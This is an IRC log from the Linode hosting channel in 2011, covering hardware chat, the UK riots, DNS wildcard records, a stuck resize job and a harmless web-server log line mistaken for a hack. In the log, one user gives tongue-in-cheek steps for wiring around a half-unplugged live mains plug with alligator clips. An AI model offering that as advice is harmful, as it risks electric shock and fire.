04:17<dcraig>maybe they're just making up words to placate us until they finally buy a battery
04:21-!-Zr40 [~zr40@193.173.155.88] has joined #linode
04:33<@heckman>dcraig: 1+1 redundancy typically offers the advantage of additional failover transparency in the event of component failure. The level of resilience is referred to as active/active or hot as backup components actively participate with the system during normal operation. Failover is generally transparent (disruption to system availability) as failover does not actually occur (just degradation to system resilience) as the backup components were already ac
04:34<X-LP>http://en.wikipedia.org/wiki/Uninterruptible_power_supply#N.2B1 :)
04:34<chesty>!!enter
04:35<@heckman>Redundant protection can be extended further yet by connecting each power supply to its own UPS. This provides double protection from both a power supply failure and a UPS failure, so that continued operation is assured. This configuration is also referred to as 1+1 or 2N redundancy. If the budget does not allow for two identical UPS units then it is common practice to plug one power supply into mains power and the other into the UPS.[
04:35<@heckman>:)
04:35<dcraig>oh ok
04:35<dcraig>here's how I run things
04:35<dcraig>I got 5 UPS things
04:35<dcraig>I plug the first into the second, the second into the third, the third into the fourth, and the fourth into the fifth
04:36<dcraig>I plug my computer into the fifth
04:36<dcraig>done.
04:36<X-LP>what if you have to replace one of them? system has to go down :o
04:36<dcraig>you can replace any but the fifth at any time
04:37<chesty>I've got two ups, I connect the first into the second, and the second into the first
04:37<X-LP>so hope the 5th doesnt fail then?
04:37<X-LP>seems like a silly solution
04:37<dcraig>if you need to replace the fifth, pull the electric plug out about 2 mm...
04:37<@heckman>chesty: haha
04:37<dcraig>get some wires and wire it up to the fourth
04:37<dcraig>then pull the plug out the rest of the way
04:37<dcraig>now you can replace the fifth
04:38<@heckman>chesty: I kind of want to do that now and see how long it lasts
04:38-!-walterheck [~walterhec@78.180.87.129] has left #linode []
04:39<chesty>heckman: a client told me he actually did that, and he killed both ups with battery acid leaking everywhere
04:39<AlexC_>dcraig: sounds like a safe activity for all the family ...
04:39<@heckman>On second thought, I think I'll pass.
04:39<dcraig>no, you need to be a trained professional
04:39<dcraig>and good with alligator clips
04:39<chesty>obvious troll is obvious to most, but not all
04:40<@heckman>:p
04:40<chesty>i don't mean i was trolling heckman, a client really did do that
04:41-!-ender|h [~ender@c-98-202-87-28.hsd1.ut.comcast.net] has joined #linode
04:42-!-burningdog [~roger@152.111.37.118] has joined #linode
04:45<chesty>area man fed up with government, steals from local small business owners
04:46<AlexC_>sounds like home right about now
04:47<chesty>imagine if the usa rioted everytime a cop shots someone dead
04:47-!-ender|a [~ender@c-98-202-87-28.hsd1.ut.comcast.net] has quit [Ping timeout: 480 seconds]
04:48<Narcissus>they're not rioting because they shot someone
04:48<Narcissus>the initial unrest was due to someone getting shot
04:48<Narcissus>the recurring ones are stupid people who have seen rioters on tv and though 'I CAN GET FREE STUFF BY BEING A DICK AND AGRESSIVE'
04:48<Narcissus>etc etc etc
04:49<AlexC_>the anger and frustration towards our government hasn't helped either; people seem to see it as a way to vent
04:49<@heckman>Man, if I was the cops I would have come out in full riot gear and used enough tear gas to melt the brick on the buildings.
04:49<AlexC_>bring the Army in, show people who boss
04:50<@heckman>^
04:50<@heckman>Marching is one thing. Once stuff catches on fire, etc...there needs to be action taken
04:50<AlexC_>we're (the UK) too soft, people don't tend to fear the police here
04:50<Narcissus>makes you somewhat depressed about our country
04:50<AlexC_>the worst we'll get is our cups of tea taken off us and told to sit on the naughty step
04:50<Narcissus>people in greece riot due to their economy
04:51<Narcissus>people in egypt riot against their government
04:51<Narcissus>people in the uk riot and steal tvs from dixons
04:51<AlexC_>haha
04:51<@heckman>I think anyone who *participated* in the riot should be locked up for at least a year.
04:51<AlexC_>and then post pictures of the stolen goods with yourself in the picture onto Facebook
04:52<@heckman>"But I didn't do anything..." 'Why were you there?'
04:52-!-Bullrush [~paul@dsl-242-162-205.telkomadsl.co.za] has joined #linode
04:52<@heckman>I need static bags. http://goo.gl/r0HXW ... pack of 0?
04:53<Narcissus>you need bags of static?
04:53<@heckman>antistatic
04:53<Narcissus>:)
04:53<Narcissus>I need to stop doing that
04:53*Narcissus goes to read webcomics and continue idling
04:54<AlexC_>yeah I should probably do some work :P
04:54-!-joyce [~cb935f35@chat.linode.com] has quit [Quit: CGI:IRC]
04:59<Bullrush>Anyone else had intrusion attempts on their Linode?
05:00<dcraig>no just you
05:00<@ericoc>probably anyone who has port 22 open to the Internet
05:00<@ericoc>dcraig ninja'd
05:00<dcraig>heckman, what's going in the bags?
05:00<chesty>his balls
05:00<@heckman>I'm going to be parting out my desktop shortly. So just getting prepped for it.
05:00-!-Hoggs [~Hoggs@121-73-32-225.cable.telstraclear.net] has joined #linode
05:01<dcraig>I'll buy some of those things that go in the empty places where you don't have a PCI card
05:01<dcraig>the little metal brackety things
05:01<chesty>those bags must be thrown out by the crate full
05:01<@heckman>dcraig: I'm selling the case as well.
05:02-!-JSharp [~j@173-228-94-51.dsl.dynamic.sonic.net] has quit [Ping timeout: 480 seconds]
05:02<dcraig>ugh.
05:02<chesty>that's going to need a big static bag
05:02<dcraig>is there no electronics waste recycling facility in jersey or what?
05:02<@heckman>Why?
05:02<dcraig>save you the trouble of trying to sell all that stuff
05:02<dcraig>:p
05:03<@heckman>Well, I'm certain selling it would get me about $1000-$1200.
05:03<dcraig>k
05:03<dcraig>must have been a nice computer
05:03<dcraig>what's the cpu? how much ram? video card?
05:05<@heckman>Core i7 920, 6GB of DDR3 OCZ (Triple Channel Kit), XFX ATi Radeon 5870
05:06<@heckman>The case and PSU combo should fetch me a decent amount of change.
05:06<@ericoc>does it go to 11?
05:07-!-Bullrush [~paul@dsl-242-162-205.telkomadsl.co.za] has left #linode []
05:07<@heckman>wat
05:09<@heckman>2 motherboards to sell as well
05:09<dcraig>I've taken to just giving away old computer stuff
05:10<@heckman>It's only like 1.5 years old
05:10<dcraig>or adding it to the collection or random parts at work
05:10*Alan pokes dcraig
05:10<dcraig>why u need a new computer already?
05:10<@heckman>Getting newer hardware.
05:10<Alan>Desktop parts don't sell for nearly enough...
05:10<Alan>I need to keep talking myself out of an upgrade for the sake of an upgrade
05:11<Alan>I could possibly do with a massive SSD
05:11<Alan>or a 30" monitor
05:11<dcraig>my 4-year-old desktop is still plugging along just great
05:11<@heckman>My new build is going to be 2x 128 SSD running in RAID 0
05:11<dcraig>got some new monitors for it though!
05:11<Alan>but currently my desktop is i5-760, 2x4GB DDR3-1600, GTX460
05:12<@heckman>Going to be switching to GTX 580
05:12<Alan>heckman: good luck finding a SATA-III controller that'll do 1200MB/s
05:13<Alan>new SSDs appear to be good enough to saturate SATA-III...
05:13<Kyhwana>Alan: yup
05:13<Kyhwana>also mrp?
05:13<@heckman>Alan: ASUS Rampage Extreme 3 Black Edition. It'll be fine.
05:14<Kyhwana>there are SATA3 controllers that do ~600MB/s
05:14<Kyhwana>just get a board that has one
05:15<@heckman>http://www.newegg.com/Product/Product.aspx?Item=N82E16813131726
05:16<@heckman>It'll have it. :)
05:18-!-Bullrush [~paul@dsl-242-162-205.telkomadsl.co.za] has joined #linode
05:19*Kyhwana got a 160GB intel 320 series, it's only 3gbit controller, but it's plenty fast enough
05:19<Kyhwana>and I got 40GB more of space for the same price
05:24-!-kraz [~k@124-198-138-127.dynamic.dsl.maxnet.co.nz] has joined #linode
05:26-!-kraz_ [~k@124-198-136-23.dynamic.dsl.maxnet.co.nz] has quit [Ping timeout: 480 seconds]
05:27<@heckman>Space isn't really an issue for me. Only core OS is saved on my "C:\" drive.
05:32-!-nenolod [~nenolod@tortois.es] has quit [Quit: leaving]
05:32-!-nenolod [~nenolod@tortois.es] has joined #linode
05:34<dcraig>heckman is all your data in the cloud?
05:36<@heckman>Nah. Other very non-cloudy hard drives
05:36<@heckman>:p
05:36*heckman kicks his ssh connection
05:36-!-datagutt [~datagutt@121.80-202-130.nextgentel.com] has joined #linode
05:37<datagutt>Did the network go down in london for anyone else?
05:37<datagutt>Got some ping timeouts last night...
05:37<dcraig>like a day ago?
05:38<datagutt>Nah, like some hours ago.. About 05:00 GMT+1..
05:38<dcraig>probably rioting in the datacenter
05:38<datagutt>my webserver is down also, but i can connect via ssh
05:38<mikegrb_>lulz
05:38<datagutt>lol
05:38<mikegrb_>lulz
05:38<Kyhwana>lol
05:38<Kyhwana>datagutt: then its your linode
05:39<datagutt>Yeah
05:39-!-sam350 [~sam350@c-98-207-99-240.hsd1.ca.comcast.net] has quit [Ping timeout: 480 seconds]
05:39<dcraig>I haven't noticed any problems in london
05:39<AlexC_>London is fine for me
05:39<datagutt>status.linode.com doesnt say anything either, so yeah, it somehow messed up when i was asleep :p
05:39-!-walterheck [~walterhec@78.180.87.129] has joined #linode
05:40-!-lunks [~lunks@189.6.225.102] has quit [Quit: lunks]
05:40<datagutt>[Wed Aug 10 03:32:13 2011] [error] [client 58.218.199.250] script not found or unable to stat: /usr/lib/cgi-bin/son!fuckyou.php
05:40-!-smed_ [~smed@ool-4353493d.dyn.optonline.net] has quit [Read error: Connection reset by peer]
05:40<datagutt>...
05:40-!-smed [~smed@ool-4353493d.dyn.optonline.net] has joined #linode
05:40<datagutt>maybe i got hacked ? o_0
05:40<Kyhwana>datagutt: did you goto DEFCON?
05:40<datagutt>nope
05:40-!-walterheck [~walterhec@78.180.87.129] has quit [Remote host closed the connection]
05:41-!-walterheck [~walterhec@78.180.87.129] has joined #linode
05:42<datagutt>Cant get why i would be so either, i think i secured my box pretty well..
05:43<AlexC_>datagutt: what makes you think you were "hacked" from that?
05:43<datagutt>I thought it might be a possibility, but it seems its just logs
05:43<datagutt>failed attempts..
05:43<AlexC_>if I do `curl yourhostname/lawlihackedyou.php` that'll show up in your logs
05:44<datagutt>Yeah i know
05:44<AlexC_>(more than likely, if you're logging 404s for example)
05:45<datagutt>Ok, so
05:45<datagutt>the webserver was up, varnish wasnt restarted yet
05:45<datagutt>i feel stupid now :)
05:46<AlexC_>stupidity is part of learning
05:47<datagutt>Still not sure why it went down… Nothing in the logs show anything yet :)
05:49-!-Hellojere [~Hellojere@89.7.90.160] has joined #linode
05:56-!-Knight [~BOSS@snubby.user.oftc.net] has quit [Quit: Leaving]
05:59-!-Zr40 [~zr40@193.173.155.88] has quit [Quit: leaving]
06:00-!-Zr40 [~zr40@193.173.155.88] has joined #linode
06:05-!-rurufufuss [~rurufufus@115-64-27-246.static.tpgi.com.au] has joined #linode
06:10-!-DephNet[Paul] [~Paul@95.172.231.221] has joined #linode
06:15-!-wkl_ [~wkl@219.142.118.233] has joined #linode
06:18-!-tibra is now known as tibra|away
06:20-!-wkl [~wkl@61.135.152.207] has quit [Ping timeout: 480 seconds]
06:20-!-wkl_ is now known as wkl
06:30-!-imroot702 [~imroot702@glitch.hackerish.org] has quit [Remote host closed the connection]
06:32-!-lunks [~lunks@189.6.225.102] has joined #linode
06:35-!-tibra|away is now known as tibra
06:52-!-alnewkirk [~alnewkirk@pool-98-114-37-114.phlapa.fios.verizon.net] has quit [Ping timeout: 480 seconds]
06:53-!-alnewkirk [~alnewkirk@pool-98-114-37-114.phlapa.fios.verizon.net] has joined #linode
07:02-!-MacsFromGS [~MacsFromG@5adc1747.bb.sky.com] has joined #linode
07:03-!-Zr40 [~zr40@193.173.155.88] has quit [Quit: leaving]
07:06-!-rurufufuss [~rurufufus@115-64-27-246.static.tpgi.com.au] has quit [Ping timeout: 480 seconds]
07:11-!-hawk [~hawk@a.qw.se] has quit [Quit: brb]
07:12-!-akiva [~akiva@bzq-79-183-232-66.red.bezeqint.net] has quit [Quit: akiva]
07:15-!-rurufufuss [~rurufufus@115-64-27-246.static.tpgi.com.au] has joined #linode
07:15-!-hawk [~hawk@a.qw.se] has joined #linode
07:18-!-wkl [~wkl@219.142.118.233] has quit [Quit: wkl]
07:19<+linbot>New news from forums: RFT: 3.0.0-linode35 and 3.0.0-x86_64-linode20 in Current Betas <http://forum.linode.com/viewtopic.php?t=7505>
07:20-!-oponder [~oponder@mail.memocom.nl] has joined #linode
07:35-!-scorche` [~scorche@174-26-1-14.phnx.qwest.net] has joined #linode
07:35-!-scorche [~scorche@174-26-1-14.phnx.qwest.net] has quit [Read error: Connection reset by peer]
07:35-!-scorche` is now known as scorche
07:46-!-lunks [~lunks@189.6.225.102] has quit [Quit: lunks]
07:51-!-oeuftete [~oeuftete@142.68.81.17] has quit [Ping timeout: 480 seconds]
07:52-!-vandemar [spin@2001:470:1f10:56b::4] has joined #linode
07:53-!-vandemar_ [syndicate@2001:470:1f10:56b::4] has quit [Read error: Connection reset by peer]
07:58-!-takamichi [Takamichi@c127-2.i07-32.onvol.net] has quit [Ping timeout: 480 seconds]
07:58-!-takamichi [~pri@217.23.4.104] has joined #linode
08:01-!-techhelper1 [~techhelpe@user-0c9h7po.cable.mindspring.com] has quit [Quit: Computer has gone to sleep.]
08:11-!-BarkerJr [BarkerJr@2002:1802:e75d:1:cfc:d041:3408:3452] has quit [Remote host closed the connection]
08:15-!-kms [~kms@rad.22pf.org] has joined #linode
08:24-!-DrJ [~Bacon@67.237.34.90] has joined #linode
08:29<@heckman>http://xkcd.com/912/
08:31-!-TIBS011 [~TIBS01@host-92-20-148-178.as13285.net] has quit [Ping timeout: 480 seconds]
08:35<chesty>if that's the password one, I've forgotten the correct horse staple password
08:36-!-Kyhwana_ [~luizg@ip-118-90-44-114.xdsl.xnet.co.nz] has joined #linode
08:39-!-Prottoz [~exwuriit@189-041-197-002.xd-dynamic.ctbcnetsuper.com.br] has quit [Quit: CyberScript - not made by microsoft (www.cyberscript.org)]
08:39-!-lunks [~lunks@189.63.138.62] has joined #linode
08:39-!-lunks_ [~lunks@189.63.138.62] has joined #linode
08:39-!-lunks [~lunks@189.63.138.62] has quit [Read error: Connection reset by peer]
08:39-!-lunks_ is now known as lunks
08:40-!-Kyhwana [~luizg@ip-118-90-12-212.xdsl.xnet.co.nz] has quit [Read error: Operation timed out]
08:40-!-Prottoz [~exwuriit@189-041-197-002.xd-dynamic.ctbcnetsuper.com.br] has joined #linode
08:41-!-bbeausej [~Adium@mirage.turbulent.ca] has joined #linode
08:44-!-alnewkirk [~alnewkirk@pool-98-114-37-114.phlapa.fios.verizon.net] has quit [Ping timeout: 480 seconds]
08:49-!-Hoggs [~Hoggs@121-73-32-225.cable.telstraclear.net] has quit [Quit: Leaving]
08:51-!-jxpx777 [~jxpx777@nmd.sbx06212.ftwortx.wayport.net] has joined #linode
08:52-!-jxpx777 [~jxpx777@nmd.sbx06212.ftwortx.wayport.net] has quit []
08:56<dzho>correct horse battery staple, ie, today's
09:00-!-akerl [~Les@pool-70-109-61-224.clppva.fios.verizon.net] has quit [Quit: Bye]
09:00-!-jbw [~jbw@dsl-044-084.cust.imagine.ie] has joined #linode
09:00<jbw>hey there little buddies!
09:01<jbw>how much diskspace is possible with a linode slice?
09:02<@heckman>How large are you looking to go?
09:02<jbw>200-400GB
09:03<jbw>300GB should probably be enough
09:03<@heckman>You can see our full listing of plans here: http://manager.linode.com/signup -- For that requirement you would probably need a Linode8GB or larger.
09:03<jbw>thanks very much
09:04<@heckman>np
09:05-!-TIBS011 [~TIBS01@host-92-20-179-193.as13285.net] has joined #linode
09:05-!-rurufufuss [~rurufufus@115-64-27-246.static.tpgi.com.au] has quit [Ping timeout: 480 seconds]
09:06-!-takamichi [~pri@217.23.4.104] has quit [Ping timeout: 480 seconds]
09:06-!-takamichi [Takamichi@c127-2.i07-32.onvol.net] has joined #linode
09:07<marius>silly heckman, you make more money if you make him upgrade his 512 to have 300GB! :P
09:09-!-cps [~cps@c-69-255-165-196.hsd1.md.comcast.net] has quit [Ping timeout: 480 seconds]
09:11-!-bencaron [~benoit@68.67.52.162] has joined #linode
09:11-!-cps [~cps@c-69-255-165-196.hsd1.md.comcast.net] has joined #linode
09:13-!-warren [~warren@cpe-76-93-222-127.hawaii.res.rr.com] has quit [Ping timeout: 480 seconds]
09:14-!-imroot702 [~imroot702@glitch.hackerish.org] has joined #linode
09:14-!-rurufufuss [~rurufufus@115-64-27-246.static.tpgi.com.au] has joined #linode
09:16-!-bencaron [~benoit@68.67.52.162] has quit [Read error: Operation timed out]
09:18<SirFunk>hey is it possible to do wildcard dns with the dns manager? I made a A name that is just '*' but it doesn't seem to work
09:19<marius>Of course you can
09:19<chesty>SirFunk: how long ago did you make it?
09:19<SirFunk>chesty: maybe 7 hours ago
09:20-!-oponder [~oponder@mail.memocom.nl] has quit [Ping timeout: 480 seconds]
09:20<chesty>what's the domain?
09:21<SirFunk>hmm... if i dig foobar.mysite.com it resolves.. but if i ping it it doesn't work
09:21<SirFunk>chesty: jeffutter.com
09:21<SirFunk>i think some cache hasn't updated somewhere
09:21<chesty>os x?
09:22<SirFunk>linux
09:23-!-apsqwla [~apsqwla@96-32-64-176.dhcp.gwnt.ga.charter.com] has quit [Ping timeout: 480 seconds]
09:23<chesty>weird, what's the error message ping prints?
09:23<SirFunk>ping: unknown host a.jeffutter.com
09:23-!-Bass10 [~Bass10@c-76-113-194-7.hsd1.mn.comcast.net] has joined #linode
09:24<chesty>have you tried ping jahdsjhds.jeffutter.com ?
09:25<chesty>btw, when I try and ping a, it resolves, but I don't get a response, a firewall i imagine
09:27<SirFunk>hmm.. if i ping jeffutter.com it works.. a shoudl work too
09:27-!-smed [~smed@ool-4353493d.dyn.optonline.net] has quit [Read error: Connection reset by peer]
09:27-!-smed [~smed@ool-4353493d.dyn.optonline.net] has joined #linode
09:27<SirFunk>oh yeah.. ya know.. i think it's fine now
09:27<SirFunk>i think one or 2 subdomains are cached somewhere, not a biggie
09:28-!-bencaron [~benoit@68.67.52.162] has joined #linode
09:31-!-TIBS011 [~TIBS01@host-92-20-179-193.as13285.net] has quit [Read error: Connection reset by peer]
09:32-!-TIBS011 [~TIBS01@host-92-20-179-193.as13285.net] has joined #linode
09:38-!-sivy [~sivy@ip98-167-222-209.ph.ph.cox.net] has joined #linode
09:42-!-alnewkirk [~alnewkirk@pool-98-114-37-114.phlapa.fios.verizon.net] has joined #linode
09:45-!-linville [~linville@sapphire.tuxdriver.com] has joined #linode
09:47-!-nisstyre [~nisstyre@infocalypse-net.info] has quit [Ping timeout: 480 seconds]
09:47-!-bkej [~bkej@prometej.fmf.uni-lj.si] has joined #linode
09:47-!-bkej [~bkej@prometej.fmf.uni-lj.si] has quit []
09:55-!-oponder [~oponder@145-118-116-102.fttx.bbned.nl] has joined #linode
09:57-!-oponder [~oponder@145-118-116-102.fttx.bbned.nl] has quit [Remote host closed the connection]
09:58-!-jas4711_ [~jas@109.58.107.30.bredband.tre.se] has joined #linode
10:01-!-oponder [~oponder@145-118-116-102.fttx.bbned.nl] has joined #linode
10:01-!-oponder [~oponder@145-118-116-102.fttx.bbned.nl] has quit [Remote host closed the connection]
10:04-!-jas4711__ [~jas@109.58.203.195] has quit [Ping timeout: 480 seconds]
10:05-!-petemall [~petemall@99-99-38-103.lightspeed.sntcca.sbcglobal.net] has joined #linode
10:08-!-heliostatic [~heliostat@c-71-204-188-68.hsd1.ca.comcast.net] has joined #linode
10:09-!-heliostatic [~heliostat@c-71-204-188-68.hsd1.ca.comcast.net] has quit [Remote host closed the connection]
10:09-!-Deegie [~Deegie@41.0.130.18] has quit [Quit: Linkinus - http://linkinus.com]
10:09-!-heliostatic [~heliostat@71.204.188.68] has joined #linode
10:10-!-Deegie [~Deegie@41.0.130.18] has joined #linode
10:13-!-niemeyer [~niemeyer@72-254-15-217.client.stsn.net] has joined #linode
10:15-!-oponder [~oponder@145-118-116-102.fttx.bbned.nl] has joined #linode
10:15-!-oponder [~oponder@145-118-116-102.fttx.bbned.nl] has quit [Remote host closed the connection]
10:20-!-heliostatic [~heliostat@71.204.188.68] has quit [Remote host closed the connection]
10:22<+linbot>New news from forums: Request: Linode Firewall in Feature Request/Bug Report <http://forum.linode.com/viewtopic.php?t=7537>
10:24-!-wt3c [~carlos@mvx-200-196-57-166.mundivox.com] has joined #linode
10:26-!-mariorz [u490@irccloud.com] has quit []
10:26<Sophira>Hiya. I'm trying to migrate a Linode, and I was wondering if it's correct that the "Linode Migration Cleanup" (ie, the *last* job) seems to be erunning - it displays a "Took" time - but the other jobs, iclulding the disk image migration and initial configuration jobs - still show as "Waiting..."?
10:27<Sophira>(I'm resizing my Linode, to be more precise)
10:27<Sophira>(So it's not a migration to another datacenter)
10:30-!-pigdude [~tallen@gateway1.atlantic-media.us] has joined #linode
10:31<@heckman>Sophira: it queues the jobs and times them from queueing -> complete
10:32<Sophira>heckman: Okay. But wouldn't that mean then that only the last job has actually been queued?
10:32<mwalling>Sophira: reverse order
10:32<Sophira>It seems to not make sense...
10:32<mwalling>Sophira: the oldest job (the first one submitted) is on the bottom of the stack
10:32<Sophira>I know that.
10:32<Sophira>When I said the first job, I meant the one at the bottom.
10:33<Sophira>And the migration cleanup one - the last job - is at the top.
10:33*Sophira takes a screenshot to make clear what she's looking at.
10:34<@heckman>Sophira: Found it. I'd sy open a ticket. :)
10:34<@heckman>say**
10:34<@heckman>I was misunderstanding what you were saying, so my mistake on that one.
10:34<Sophira>Ah, okay.
10:35-!-SamT [~sam@c-98-238-172-142.hsd1.ca.comcast.net] has quit [Read error: Connection reset by peer]
10:35<chesty>Sophira: are you australian? things happen upside down here
10:35<Sophira>The Linode in question is disposable, so I can easily delete and re-add it, which is probably preferable in this case because I was trying to resize to a Linode 2048 and I only planned on keeping it for a day or so.
10:36<Sophira>*grins*
10:36<Sophira>Should I open a ticket so that staff are aware of the problem, or should I just delete and recreate?
10:36<@heckman>Sophira: With the jobs being entered in the queue I would suggest opening a ticket.
10:36<Sophira>Okay.
10:37*heckman slips his headphones back on and continues reading
10:42<@heckman>chesty: You would make that joke.
10:43<@heckman>For some reason that reminded me that I need to go back home to Reading for something.
10:43<Sophira>Ticket made! (#553015)
10:43*heckman tries to figure out when he can do that
10:44<@heckman>Sophira: Good deal. Should be snagged momentarily.
10:48-!-TIBS011 [~TIBS01@host-92-20-179-193.as13285.net] has quit [Ping timeout: 480 seconds]
10:49-!-TIBS011 [~TIBS01@host-92-20-154-71.as13285.net] has joined #linode
10:49-!-epochwolf [~epochwolf@c-24-22-164-206.hsd1.wa.comcast.net] has joined #linode
10:54-!-ktabic_ [~ktabic@host81-148-32-198.in-addr.btopenworld.com] has joined #linode
10:57<Sophira>Looks like it's a host problem; ericoc just sent out a notice for people on dallas146.
10:57-!-ktabic [~ktabic@host81-139-94-147.in-addr.btopenworld.com] has quit [Ping timeout: 480 seconds]
10:59<@Perihelion>Eric broke it.
10:59<@heckman>Blame Eric...
11:01<chesty>!ericoc
11:01<+linbot>That's ericOC -> http://www.imdb.com/title/tt0362359/ (sssh, he's a big fan)
11:01<Louis6321>Sophira, i had the same issue the other day and I reported it via ticket. The admins are aware of it already.
11:02<@heckman>Brb, need to restart X
11:02*pronto restarts heckman
11:02<praetorian> i need to restart x too.. did a arch update and get all these VTE errors
11:02-!-ktabic_ [~ktabic@host81-148-32-198.in-addr.btopenworld.com] has quit [Quit: I'm a professionally trainined computer scientist. That is to say, I am poorly educated]
11:02<@heckman>back
11:02<praetorian>but maybe on the weekend
11:03<pronto>oh hi
11:03<pronto>praetorian: you running kernel3 yet on arch?
11:03<pronto>i've been hearing bad things...
11:03<praetorian>nah
11:03<@heckman>My Arch test Linode is running 3.0.0-linode35
11:04-!-hfb [~hfb@cpe-98-151-252-78.socal.res.rr.com] has quit [Quit: Leaving]
11:04<AlexC_>pronto: I'm running 3.0.1 on my desktop Arch at home, no problems
11:04<pronto>AlexC_: new isntall, or update?
11:04<AlexC_>pronto: update
11:05<praetorian>heckman: fun
11:05<praetorian>Perihelion: EHH OHH
11:06<Sophira>Louis6321: Apparently I tiggered some sort of investigation, because they sent out a host-wide notice about it not long after and now everything#s moving :)
11:06<Louis6321>Sophira, which host?
11:06<@heckman>Well...my desktop just pulled a Dale Earnhardt.
11:07<praetorian>a what? can you speak non nascar
11:07<praetorian>:p
11:07<@heckman>Crashed and died.
11:07<Sophira>Louis6321: dallas146. They rebooted the host and now it's working.
11:07<@heckman>X freaked the heck out after logging back in.
11:07<Louis6321>Sophira, mine is dallas369
11:07<@heckman>s/X/videocard/
11:08<Louis6321>Sophira, My Linode Migration Cleanup failed and was never re-run
11:08<praetorian>oh.. so you should say .. it did an Ayrton Senna
11:08*Sophira realises this kind of makes her indirectly responsible for someone losing their massive uptime count, but of course they'd have had to reboot it anyway, so. ;p
11:08<mikegrb_>lulz
11:08<Louis6321>^ lol
11:08<Sophira>Louis6321: Ah. Mine had just kept running for about 50 minutes or so.
11:09<Louis6321>Sophira, ohhh, mine ran while migration initialisation was still running (hence why it failed)
11:10<Louis6321>but took 0 seconds, not 50 mins
11:10<Louis6321>xD
11:10-!-pigdude [~tallen@gateway1.atlantic-media.us] has quit [Quit: leaving]
11:11<Sophira>Here's what my job queue looked like, for the record: http://neo.theblob.org/linode-resize-jobs.png
11:12-!-tibra is now known as tibra|away
11:12<Sophira>And it's all done now :D
11:15-!-Antwan [~Antwan@adsl-98-77-201-71.mia.bellsouth.net] has joined #linode
11:16<Sophira>Hah, and now my Linode isn't booting, presumably because there's a ton of previously-stuck jobs in the host queue? *will wait it out*
11:16<Sophira>There we go.
11:17<@Perihelion>praetorian: GOTTA RETURN 0
11:20-!-p3rsist [~dannyf@modemcable251.101-23-96.mc.videotron.ca] has joined #linode
11:23-!-heliostatic [~heliostat@204.14.239.223] has joined #linode
11:24-!-cereal|Away is now known as cereal
11:27-!-cps [~cps@c-69-255-165-196.hsd1.md.comcast.net] has quit [Ping timeout: 480 seconds]
11:30-!-bixgomez_ [~bixgomez@c-67-161-113-222.hsd1.wa.comcast.net] has joined #linode
11:31<mwalling>heckman: 10 years and still not cool
11:35-!-madwiredavid [~4a5cd299@chat.linode.com] has joined #linode
11:35<madwiredavid>is it possible to set up linode DNS to do wildcard subdomains?
11:35-!-madwiredavid is now known as david
11:36<david>like *.domain.com
11:36-!-david is now known as Guest5444
11:36-!-Guest5444 is now known as david11
11:36-!-tim_ [~tim@cpc1-hari12-2-0-cust76.hari.cable.virginmedia.com] has quit [Remote host closed the connection]
11:36-!-thingles [~thingles@64.244.57.226] has joined #linode
11:37-!-bixgomez [~bixgomez@c-67-161-113-222.hsd1.wa.comcast.net] has quit [Ping timeout: 480 seconds]
11:38<mwalling>david11: sure
11:38<mwalling>just put a * in
11:39<p3rsist>Anybody here familiar with corosync set up config?
11:41-!-bixgomez_ [~bixgomez@c-67-161-113-222.hsd1.wa.comcast.net] has quit [Read error: Operation timed out]
11:41<A-KO>http://seclists.org/fulldisclosure/2011/Aug/76
11:47-!-karstensrage [~karstensr@c-67-174-201-143.hsd1.ca.comcast.net] has quit [Quit: Leaving]
11:47-!-nisstyre [~nisstyre@infocalypse-net.info] has joined #linode
11:48-!-tktiddle [~tim@cpc1-hari12-2-0-cust76.hari.cable.virginmedia.com] has joined #linode
11:51-!-vynsynt [~vynsynt@cg-therubin.nwknj01.paetec.net] has joined #linode
11:51-!-ktabic [~ktabic@81.187.163.185] has joined #linode
11:52-!-vynsynt [~vynsynt@cg-therubin.nwknj01.paetec.net] has left #linode []
11:53-!-tibra|away is now known as tibra
11:53-!-epochwolf [~epochwolf@c-24-22-164-206.hsd1.wa.comcast.net] has quit [Quit: Bye!]
11:53-!-tibra [~tibra@p5DD0AF9E.dip.t-dialin.net] has quit [Remote host closed the connection]
11:53<Antwan>I have a vanilla ubuntu LAMP server and last night I got 3 notifications my server was at 400% CPU usage for over 6 hours, is there any way for my to see what caused this?
11:54-!-david11 [~4a5cd299@chat.linode.com] has quit [Quit: CGI:IRC]
11:57-!-Xenc [~Xenc@188-223-140-153.zone14.bethere.co.uk] has quit [Quit: Xenc]
11:58-!-Xenc [~Xenc@188-223-140-153.zone14.bethere.co.uk] has joined #linode
11:58<Antwan>here's a screen of the graphs http://dl.dropbox.com/u/560070/Linode%20-%20Dashboard%20--%20Simba_1312991709214.png
11:58-!-mathew [~mathew@cpc5-flit3-2-0-cust101.9-1.cable.virginmedia.com] has joined #linode
12:00<JshWright>what does your disk I/O look like during that time?
12:02<Antwan>sec
12:03<Antwan>http://dl.dropbox.com/u/560070/Linode%20-%20Dashboard%20--%20Simba_1312992144814.png
12:03-!-burningdog [~roger@152.111.37.118] has quit [Quit: burningdog]
12:03-!-neilio [~neilio-2@xavier.macowner.com] has quit [Read error: Operation timed out]
12:07-!-gawry [~gustavoga@187.126.136.210] has joined #linode
12:10-!-pkiller [~kiki@pcmozak.com] has quit [Quit: leaving]
12:10<gawry>I have a mail server which is mail1.domain.com and i've added another domain to my linode account. What should I add as the MX for the otherdomain.com?
12:11-!-Lucas1 [~Lucas@ip134-10.ct.co.cr] has joined #linode
12:11<mwalling>mail1.domain.com?
12:11<mwalling>all of my domains list their MX as you.dontlike.us
12:12<gawry>mwalling: ?
12:12<mwalling>... yes?
12:13<gawry>whats the point with that?
12:13-!-Obsidian|server [~solas@209.236.124.196] has quit [Ping timeout: 480 seconds]
12:13<mwalling>huh?
12:14<mwalling>!dig clowncar.org MX
12:14<+linbot>mwalling: [dig] status: NOERROR | ;; ANSWER SECTION: clowncar.org. 86400 IN MX 10 you.dontlike.us. | ;; AUTHORITY SECTION clowncar.org. 86400 IN NS ns3.linode.com. clowncar.org. 86400 IN NS ns1.linode.com. clowncar.org. 86400 IN NS ns4.linode.com. clowncar.org. 86400 IN NS ns2.linode.com. clowncar.org. 86400 IN NS ns5.linode.com.
12:14<mwalling>!dig donlike.us MX
12:14<+linbot>mwalling: [dig] status: NXDOMAIN | ;; ANSWER SECTION: | ;; AUTHORITY SECTION us. 900 IN SOA a.cctld.us. hostmaster.neustar.biz. 2006289700 900 900 604800 86400
12:14<mwalling>er
12:14<mwalling>!dig you.donlike.us MX
12:14<+linbot>mwalling: [dig] status: NXDOMAIN | ;; ANSWER SECTION: | ;; AUTHORITY SECTION us. 900 IN SOA a.cctld.us. hostmaster.neustar.biz. 2006289700 900 900 604800 86400
